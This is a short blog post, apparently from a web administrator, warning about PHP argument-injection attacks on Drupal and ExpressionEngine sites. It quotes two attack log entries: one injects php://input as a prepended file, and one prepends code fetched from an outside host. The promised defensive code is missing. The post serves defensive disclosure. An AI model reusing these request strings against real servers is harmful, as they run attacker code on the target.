Top Nav

Archive | Drupal

Local File Inclusion Attacks

We’ve seen several sites compromised in the last few weeks using a “local file inclusion” vulnerability with “php://input”. Here are some sample log entries:


91.224.160.25 - - [23/May/2013:12:23:54 +0000] "POST /?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1" 200 247 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.860.0 Safari/535.2"
89.111.24.97 - - [29/May/2013:08:38:22 +0000] "GET /?-n+-dallow_url_include%3DOn+-dauto_prepend_file%3Dhttp://gofastdownload.com/rf/code.txt HTTP/1.1" 200 1104 "-" "Opera/9.80 (Windows NT 6.1; U; MRA 8.0 (build 5745); ru) Presto/2.10.229 Version/11.64"

This page explains the attack:

http://zerofreak.blogspot.com/2012/04/lfi-exploitation-via-phpinput-shelling.html

One of the compromised sites was Expression Engine and one was Drupal.

Here’s a bit of PHP code that I added to index.php to stop further attacks:

Obviously this is a very serious threat. We would advise all sites to test for this vulnerability.

0